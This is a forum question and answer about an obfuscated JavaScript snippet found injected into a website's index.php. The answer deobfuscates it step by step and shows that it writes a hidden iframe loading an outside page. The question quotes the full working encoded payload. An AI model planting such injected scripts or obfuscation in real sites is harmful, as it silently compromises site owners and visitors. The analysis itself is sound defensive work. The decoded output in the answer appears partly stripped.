Home/ Questions/Q 7926603
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-03T18:50:47+00:00

This script appeared in the index.php page of a website I help with: <script

  • 0

This script appeared in the index.php page of a website I help with:

<script type="text/javascript">$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\"+$.__$+$.$_$+$.$_$+$.$$$_+"\"+$.__$+$.$_$+$.$$_+$.__+".\"+$.__$+$.$$_+$.$$$+"\"+$.__$+$.$$_+$._$_+"\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"('<"+$.$$_$+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$$_+$.$$_+"\"+$.$__+$.___+"\"+$.__$+$.$$_+$._$$+$.__+"\"+$.__$+$.$$$+$.__$+(![]+"")[$._$_]+$.$$$_+"=\\"\"+$.__$+$.$$_+$.$$_+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$$_+$._$$+"\"+$.__$+$.$_$+$.__$+$.$_$$+"\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+"\"+$.__$+$.$_$+$.__$+$.__+"\"+$.__$+$.$$$+$.__$+":\"+$.$__+$.___+"\"+$.__$+$.$_$+$.___+"\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$_$+$.$$$_+"\"+$.__$+$.$_$+$.$$_+";\\"><\"+$.__$+$.$_$+$.__$+$.$$$$+"\"+$.__$+$.$$_+$._$_+$.$_$_+"\"+$.__$+$.$_$+$.$_$+$.$$$_+"\"+$.$__+$.___+"\"+$.__$+$.$$_+$._$$+"\"+$.__$+$.$$_+$._$_+$.$$__+"=\\"\"+$.__$+$.$_$+$.___+$.__+$.__+"\"+$.__$+$.$$_+$.___+"://"+$.$$$$+"\"+$.__$+$.$$_+$._$_+".\"+$.__$+$.$__+$.$$$+$.$$$_+$._$+"\"+$.__$+$.$$_+$._$_+"\"+$.__$+$.$__+$.$$$+$.$$$_+"\"+$.__$+$.$_$+$._$$+$._$+"\"+$.__$+$.$_$+$.___+"\"+$.__$+$.$_$+$.$$_+$.$$_$+$.$$_$+"\"+$.__$+$.$$_+$._$$+"."+$.$$__+$._$+"\"+$.__$+$.$_$+$.$_$+"/"+$.$$_$+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$$_+$._$_+$.$$$_+$.$$__+$.__+".\"+$.__$+$.$$_+$.___+"\"+$.__$+$.$_$+$.___+"\"+$.__$+$.$$_+$.___+"?\"+$.__$+$.$$_+$.___+$.$_$_+"\"+$.__$+$.$__+$.$$$+$.$$$_+"="+$.$__+$._$$+$.$$$$+$.$$_$+$.$$_$+$.$__$+$.$__+$.$$__+$.__$+$.$$_+$.$$$_+$._$_+$.$$_+$.$__+$.$$$+$.$$_$+"\\"\"+$.$__+$.___+"\"+$.__$+$.$$_+$.$$$+"\"+$.__$+$.$_$+$.__$+$.$$_$+$.__+"\"+$.__$+$.$_$+$.___+"=\\""+$.$__+$.$$_+$.$___+"\\"\"+$.$__+$.___+"\"+$.__$+$.$_$+$.___+$.$$$_+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$__+$.$$$+"\"+$.__$+$.$_$+$.___+$.__+"=\\""+$.$$_+$.___+"\\"\"+$.$__+$.___+$.$_$_+(![]+"")[$._$_]+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$__+$.$$$+"\"+$.__$+$.$_$+$.$$_+"=\\""+(![]+"")[$._$_]+$.$$$_+$.$$$$+$.__+"\\">\"+$.__$+$.___+$._$$+$._$+$._+"\"+$.__$+$.$_$+$.$$_+$.__+$.$$$_+"\"+$.__$+$.$$_+$._$_+"</\"+$.__$+$.$_$+$.__$+$.$$$$+"\"+$.__$+$.$$_+$._$_+$.$_$_+"\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();
</script>

The only thing it seems to do is return an error when you try to open the page. I just removed it and everything works fine again, but we have no idea how it got there, and if it was supposed to actually do something possibly harmful. The website is hosted on aruba and both of the people who have access to the code haven’t worked on this page at all lately.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    So now it’s a puzzle.

    Pretty printing the code, it has 4 stages:

    1. Declare $
    2. Construct a dictionary using the current value of $, and then assign that to $ again
    3. Set a couple of additional key/value pairs in the dictionary using other values from the dictionary
    4. Construct an immediately called nested pair of function calls

    The $ declaration is, like everything here, a bit odd:

    $=~[];

    In a Chrome console, this returns -1; evaluated in a numerical context, [] becomes 0, and ~ (the bitwise NOT operator in javascript) on 0 yields -1. So we have a variable assigned to -1. Unobfuscate!

    v = -1;

    Then a dictionary is constructed, with an unobfuscation:

    $={ ___ : ++$,              dct={ zero  : 0,
  $$$$  : (![] + "")[$],          f     : "f",
  __$   : ++$,                    one   : 1,
  $_$_  : (![] + "")[$],          a     : "a",
  _$_   : ++$,                    two   : 2,
  $_$$  : ({} + "")[$],           b     : "b",
  $$_$  : ($[$] + "")[$],         d     : "d",
  _$$   : ++$,                    three : 3,
  $$$_  : (!"" + "")[$],          e     : "e",
  $__   : ++$,                    four  : 4,
  $_$   : ++$,                    five  : 5,
  $$__  : ({} + "")[$],           c     : "c",
  $$_   : ++$,                    six   : 6,
  $$$   : ++$,                    seven : 7,
  $___  : ++$,                    eight : 8,
  $__$  : ++$                     nine  : 9
  };                            };

    So we have a dictionary with some values in it from 0 to 9, and the letters a to f. Anyone smell hex? The method to get the letters is to pick out substrings from predictable js-generated strings; a falsy value plus “” gives “false”, for “a”, “e” and “f”. {}+"" gives [object Object], for b and c, and undefined yields the d.

    Next it constructs the $_ (we’ll call it alpha) element of the dictionary ($.$_) as a concatenation of a
    series of strings (unobf names as defined so far, plus _$ becomes beta, $$ gamma, __ delta,
    $ epsilon, _ phi):

    (dct.alpha = dct + "")[dct.five]    // dct.alpha = "[object Object]", yields "c"
(dct.beta  = dct.alpha[dct.one])    // dct.beta="o", yields "o"
(dct.gamma = (dct.epsilon + "")[dct.one]) // dct.gamma="n", "n"
((!dct) + "")[dct.three]            // "s"
(dct.delta = dct.alpha[dct.six])    // dct.delta="t", "t"
(dct.epsilon= (!"" + "")[dct.one])  // dct.epsilon="r", "r"
(dct.phi   = (!"" + "")[dct.two])   // dct.phi = "u", "u"
dct.alpha[dct.5]                    // "c"
dct.delta                           // "t"
dct.beta                            // "o"
dct.epsilon                         // "r"

    So all of this sets dct.alpha ($.$_) to “constructor”. Ominous. Similar setup for $.$$ (which we’re calling gamma), which sets it to “return”. The clouds thicken.

    Another reassignment, this time for $.$ (our dct.epsilon), sets it to 

    dct.epsilon = (dct.zero)[dct.alpha][dct.alpha]

    This is more than just an array lookup. dct.zero is 0, so (0)[“constructor”] is looking up the
    “constructor” property of 0. Remember that in javascript a[“b”] is the same as
    a.b, so (0)["constructor"]["constructor"] is 0.constructor.constructor. The constructor of 0 is the Number function, and the constructor of the
    Number function is the Function function. This function (pointer) is then assigned to dct.epsilon.
    The worm has turned.

    The final statement is a nested function call to $.$$:

    dct.epsilon(                  Function(
  dct.epsilon(                  Function(
    //long concatenation            // something functiony
  )()                           )()
)();                          )()

    The long concatenation will be passed to the function constructor and then immediately executed.
    The returned function from this function will also then be immediately executed.

    In effect, everything we’ve seen so far is scaffolding. Almost any function could be constructed this
    way, although we have an idea of the letters that will be used. I would hazard a guess that the above
    is a generic obfuscation that can hold whatever payload is desired.

    The string that is constructed character-by-characeter is:

    return "docu\155e\156t.\167\162\151te('<d \151 ... // continues

    So we can see that there are escaped sequences there. In fact, the return
    tells us that the whole docu… string will be helpfully unescaped and then returned wholesale, ready for the
    outer call to call it.

    So the outer call will recieve this now unescaped string (formatting and splitting the string for readability):

    document.write(
    ” +
    ”+
    ‘Counter’+
    ”+

    );

    Where I’ve put ‘HEXYHEXY’ instead of the hex string that was there – it would presumaby link your
    site or perhaps the virus author to this page, which we don’t really want. The domain in the iframe
    src might be connected to the virus author, or it might be just another compromised page; a worm
    could presumably use one host to direct another via this virus as an intermediary. My guess is that
    it just drives fake page impressions – every time your page is hit, so is the target page, but no-one sees
    the advert etc because of the hidden div container. The ‘Counter’ bit is just an attempt to hide
    the secret in plain sight; if you looked at the browser’s representation of the page, all you see is
    an innocent-looking Counter iframe.

    Some javascript tricks to avoid

    The virus author has a few tricks here to evade simple methods of finding such scripts:

    1. Using ASCII escaping, e.g. \155 becomes ‘m’, so the letter is never in a plain string.
    2. Passing a string to the Function function to construct an arbitrary function instead of using eval
    3. Using substrings of predictable auto-generated strings (![]+"")[3] = "false"[3] = "s" to pick out individual characters without putting them in plain strings
    4. Endless use and reuse of variables with $ and _ in the name to confuse a human reader
    5. Use of variables in dictionary declaration to make it hard to see static values without executing the code.
    6. The assignment return; (a=b) returns the value of a, so (a=b)[3] returns a substring on the value of the assignment, whilst also making the assignment
    7. Throwaway reassignment of variables within a larger assignment, e.g. a = {(a=3):"b",++a:"c"}

    All of these are things that are a very bad idea in normal code, for the very reason they are here: they make the code hard to read or understand.

    • 0